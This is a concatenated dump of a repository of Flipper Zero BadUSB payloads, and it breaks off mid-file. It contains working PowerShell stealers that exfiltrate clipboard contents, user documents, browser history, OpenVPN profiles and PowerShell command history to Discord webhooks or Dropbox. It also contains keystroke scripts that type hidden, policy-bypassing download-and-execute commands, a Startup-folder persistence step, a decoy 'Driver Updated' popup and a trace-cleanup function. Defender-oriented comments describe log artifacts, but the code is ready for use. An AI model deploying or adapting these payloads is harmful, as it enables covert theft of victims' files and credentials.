# at the top of the file). There is no delay between passes.
while (1){
$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
$cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
$xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
# Ctrl+C or Ctrl+X held down: send the clipboard contents.
# Both Ctrl keys held down (and neither C nor X): send a final message and exit the script.
# Anything else: go round the loop again.
if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
else {continue}
}
================================================
FILE: FlipperZero/payloads/Copy-And-Waste/payload.txt
================================================
REM Title: Copy-And-Waste
REM Author: atomiczsec & I am Jakoby
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
REM Keystroke sequence: wait for the HID device to enumerate, then open the Run dialog (Win+R).
DELAY 2000
GUI r
DELAY 500
REM The typed command runs a hidden PowerShell with the execution policy bypassed. It writes
REM one downloaded file into the user's Startup folder (persistence across logons), writes the
REM second into the user's APPDATA folder as c.ps1, and then runs c.ps1.
REM Host-side traces: a new file in the Startup folder, a new .ps1 under APPDATA, and the
REM command itself in the user's RunMRU registry key and in process-creation logs.
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
================================================
FILE: FlipperZero/payloads/Copy-And-Waste/placeholder
================================================
================================================
FILE: FlipperZero/payloads/De-Bloater/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Water-UnMark
A payload to get rid of the ugly windows activation watermark.
## Description
This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
## Getting Started
### Dependencies
* Unactivated Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/De-Bloater/placeholder
================================================
================================================
FILE: FlipperZero/payloads/Doc-Hog/d.ps1
================================================
function Doc-Hog {
<#
.SYNOPSIS
Sends a text message and/or a file to the webhook URL held in $hookurl.
.PARAMETER file
Optional path of a file to upload. When non-empty it is handed to curl.exe as the
multipart form field "file1".
.PARAMETER text
Optional message text. When non-empty it is posted as the 'content' field of a JSON body,
with 'username' set to the logged-on user's name ($env:username).
.NOTES
The message is sent by PowerShell (Invoke-RestMethod) and the file by a curl.exe child
process, so both proxy logs and process-creation logs carry a trace of each call.
#>
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
# Destination webhook; a placeholder in the published script.
$hookurl = 'DISCORD-WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $text
}
# Text message: only sent when $text is non-empty.
if (-not ([string]::IsNullOrEmpty($text))) {
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
}
# File upload: only attempted when $file is non-empty.
if (-not ([string]::IsNullOrEmpty($file))) {
curl.exe -F "file1=@$file" $hookurl
}
}
# Recursively lists everything under $env:HOMEPATH whose name matches one of the listed
# document, image and text extensions.
$Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse
# Maps each wildcard pattern to the label used for the archive name and the upload message.
$types = @{
"*.docx" = "Word";
"*.doc" = "Word";
"*.pptx" = "PowerPoint";
"*.xlsx" = "Excel";
"*.pdf" = "PDF";
"*.jpeg" = "JPEG";
"*.png" = "PNG";
"*.jpg" = "JPEG";
"*.csv" = "CSV";
"*.txt" = "Text";
}
# For every pattern with at least one match: zip the matching files into
# $env:TEMP\<label>.zip and pass the archive plus a status message to Doc-Hog.
# Host-side this appears as a recursive read across the user profile by powershell.exe,
# followed by new .zip files in the temp directory and one upload per archive.
foreach ($type in $types.Keys) {
$filteredFiles = $Files | Where-Object {$_.Name -like $type}
if ($filteredFiles) {
$zipFile = "$env:TEMP\$($types[$type]).zip"
$filteredFiles | Compress-Archive -DestinationPath $zipFile
Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files"
}
}
================================================
FILE: FlipperZero/payloads/Doc-Hog/payload.txt
================================================
REM Title: Doc-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
REM Target: Windows 10
REM Keystroke sequence: wait for the HID device to enumerate, then open the Run dialog (Win+R).
DELAY 2000
GUI r
DELAY 500
REM The typed command starts PowerShell with a hidden window (-w h), no profile (-NoP),
REM non-interactive mode (-NonI) and the execution policy bypassed (-ep Bypass), downloads
REM the script text and passes it to Invoke-Expression (iex).
REM The command is recorded in the user's RunMRU registry key and in process-creation logs
REM (powershell.exe started by explorer.exe); script block logging (event ID 4104) records
REM the downloaded script text.
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr <URL TO DBOX> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/Doc-Hog/readme.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Doc+Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Doc-Hog
A payload to exfiltrate files of types such as PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV
## Description
This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div align="center">
<a href="https://lnk.bio/atomiczsec">
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg" width="48" height="48" alt="Link" />
</a>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/History-Pig/HP.ps1
================================================
# History-Pig: stages copies of the Chrome and Edge "History" files (Default profile only)
# in the temp directory for upload.
# Checks whether the Chrome History file exists; the True/False result is written to the
# output stream and is not used.
Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf
# When the file does not exist, only a console message is written.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Chrome History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Otherwise the History file (the SQLite database holding the profile's browsing history)
# is copied to the temp directory as <username>-<timestamp>_chrome_history.
# A non-browser process reading this file is the host-side indicator.
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1"
}
# Same existence check for the Edge History file; the result is again only written out.
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf
# When the file does not exist, only a console message is written.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Edge History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Otherwise the Edge History file is copied to the temp directory as
# <username>-<timestamp>_edge_history.
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2"
}
function DropBox-Upload {
<#
.SYNOPSIS
Uploads one local file to the root of a Dropbox account through the Dropbox content API.
.PARAMETER SourceFilePath
Mandatory path of the file to upload (alias -f, also accepted from the pipeline). The
remote name is the file's leaf name placed under "/".
.NOTES
The request is a POST to https://content.dropboxapi.com/2/files/upload with the file as
the body, so proxy logs show the destination host and the upload size.
The access token is stored in the script text. A copy of the script recovered during
response (for example from script block logs) therefore identifies the receiving account.
#>
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token
# Remote path = "/" + local file name.
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# JSON for the Dropbox-API-Arg header, built by string concatenation: add mode, with
# autorename enabled and mute disabled.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
# The file content is sent as the raw request body (-InFile).
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Uploads the two staged history copies from the temp directory.
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
# Shows a "Driver Updated" message box through WScript.Shell that closes after 1 second;
# the text is unrelated to what the script did, so a user report of this pop-up is a
# useful lead during triage.
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: FlipperZero/payloads/History-Pig/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;History+Pig!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# History-Pig
A payload to exfiltrate the history of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/History-Pig/payload.txt
================================================
REM Title: History-Pig
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate browsers history to a dropbox
REM Target: Windows 10, 11
REM Keystroke sequence: wait for the HID device to enumerate, then open the Run dialog (Win+R).
DELAY 2000
GUI r
DELAY 500
REM The typed command starts PowerShell with a hidden window (-w h), no profile (-NoP),
REM non-interactive mode (-NonI) and the execution policy bypassed (-ep Bypass), downloads
REM the script text and passes it to Invoke-Expression (iex).
REM The command is recorded in the user's RunMRU registry key and in process-creation logs
REM (powershell.exe started by explorer.exe); script block logging (event ID 4104) records
REM the downloaded script text.
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/OVPN-Hog/o.ps1
================================================
function OVPN-Hog {
<#
.SYNOPSIS
Sends a text message and/or a file to the webhook URL held in $hookurl.
.PARAMETER file
Optional path of a file to upload. When non-empty it is handed to curl.exe as the
multipart form field "file1".
.PARAMETER text
Optional message text. When non-empty it is posted as the 'content' field of a JSON body,
with 'username' set to the logged-on user's name ($env:username).
.NOTES
The message is sent by PowerShell (Invoke-RestMethod) and the file by a curl.exe child
process, so both proxy logs and process-creation logs carry a trace of each call.
#>
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
# Destination webhook; a placeholder in the published script.
$hookurl = 'DISCORD-WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $text
}
# Text message: only sent when $text is non-empty.
if (-not ([string]::IsNullOrEmpty($text))) {
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
}
# File upload: only attempted when $file is non-empty.
if (-not ([string]::IsNullOrEmpty($file))) {
curl.exe -F "file1=@$file" $hookurl
}
}
# Recursively searches the C: drive for files with the .ovpn extension.
# OpenVPN profiles can embed certificates, private keys or credential references, so a
# profile that has left the host should be treated as compromised: revoke and reissue it.
$Drive = "C:"
$Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse
if ($Files) {
# Single-entry map from the wildcard pattern to the label used for the archive name and
# the upload message.
$types = @{
"*.ovpn" = "OpenVPN"
}
# When matches exist: zip them into OpenVPN.zip in the temp directory and pass the archive
# plus a status message to OVPN-Hog.
foreach ($type in $types.Keys) {
$filteredFiles = $Files | Where-Object { $_.Name -like $type }
if ($filteredFiles) {
$zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip"
$filteredFiles | Compress-Archive -DestinationPath $zipFile
OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files"
}
}
}
================================================
FILE: FlipperZero/payloads/OVPN-Hog/payload.txt
================================================
REM Title: OVPN-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook.
REM Target: Windows 10
REM Keystroke sequence: wait for the HID device to enumerate, then open the Run dialog (Win+R).
DELAY 2000
GUI r
DELAY 500
REM The typed command starts PowerShell with a hidden window (-w h), no profile (-NoP),
REM non-interactive mode (-NonI) and the execution policy bypassed (-ep Bypass), downloads
REM the script text and passes it to Invoke-Expression (iex).
REM The command is recorded in the user's RunMRU registry key and in process-creation logs
REM (powershell.exe started by explorer.exe); script block logging (event ID 4104) records
REM the downloaded script text.
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/OVPN-Hog/readme.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;OVPN-Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#Getting-Started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# OVPN-Hog
A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).
## Description
This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div align="center">
<a href="https://lnk.bio/atomiczsec">
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg" width="48" height="48" alt="Link" />
</a>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Powershell-History/PH.ps1
================================================
# Powershell-History: stages a copy of the PSReadLine console history file in the temp
# directory for upload.
# Checks whether the history file exists; the True/False result is written to the output
# stream and is not used.
Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf
# When the file does not exist, only a console message is written.
if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) {
try {
Write-Host "The Powershell History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Otherwise the history file is copied to the temp directory as
# <username>-<timestamp>_ps_history.txt. The file holds previously typed console commands,
# which can include secrets passed on the command line; anything found in it after an
# incident should be rotated.
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt"
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1"
}
function DropBox-Upload {
<#
.SYNOPSIS
Uploads one local file to the root of a Dropbox account through the Dropbox content API.
.PARAMETER SourceFilePath
Mandatory path of the file to upload (alias -f, also accepted from the pipeline). The
remote name is the file's leaf name placed under "/".
.NOTES
The request is a POST to https://content.dropboxapi.com/2/files/upload with the file as
the body, so proxy logs show the destination host and the upload size.
The access token is stored in the script text. A copy of the script recovered during
response (for example from script block logs) therefore identifies the receiving account.
#>
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token
# Remote path = "/" + local file name.
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# JSON for the Dropbox-API-Arg header, built by string concatenation: add mode, with
# autorename enabled and mute disabled.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
# The file content is sent as the raw request body (-InFile).
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Uploads the staged history copy from the temp directory.
DropBox-Upload -f "$env:tmp/$F1"
# Shows a "Driver Updated" message box through WScript.Shell that closes after 1 second;
# the text is unrelated to what the script did, so a user report of this pop-up is a
# useful lead during triage.
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: FlipperZero/payloads/Powershell-History/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Powershell+History!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Powershell-History
A payload to exfiltrate the history of the powershell console
## Description
This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Powershell-History/payload.txt
================================================
REM Title: Powershell-History
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
REM Target: Windows 10
REM Keystroke sequence: wait for the HID device to enumerate, then open the Run dialog (Win+R).
DELAY 2000
GUI r
DELAY 500
REM The typed command starts PowerShell with a hidden window (-w h), no profile (-NoP),
REM non-interactive mode (-NonI) and the execution policy bypassed (-ep Bypass), downloads
REM the script text and passes it to Invoke-Expression (iex).
REM The command is recorded in the user's RunMRU registry key and in process-creation logs
REM (powershell.exe started by explorer.exe); script block logging (event ID 4104) records
REM the downloaded script text.
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/Printer-Recon/PR.ps1
================================================
function DropBox-Upload {
<#
.SYNOPSIS
Uploads one local file to the root of a Dropbox account through the Dropbox content API.
.PARAMETER SourceFilePath
Mandatory path of the file to upload (alias -f, also accepted from the pipeline). The
remote name is the file's leaf name placed under "/".
.NOTES
The request is a POST to https://content.dropboxapi.com/2/files/upload with the file as
the body, so proxy logs show the destination host and the upload size.
The access token is stored in the script text. A copy of the script recovered during
response (for example from script block logs) therefore identifies the receiving account.
#>
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
# Remote path = "/" + local file name.
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# JSON for the Dropbox-API-Arg header, built by string concatenation: add mode, with
# autorename enabled and mute disabled.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
# The file content is sent as the raw request body (-InFile).
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
function Clean-Exfil {
# Removes local traces after the upload: temp files, Run-dialog history, PowerShell history
# and the recycle bin.
# Defender view: this is anti-forensic cleanup, and it also destroys the user's own temp files
# and recycle-bin contents. Nothing in this function touches the Windows event logs, so
# process-creation and PowerShell script block records (where enabled) are not affected by it.
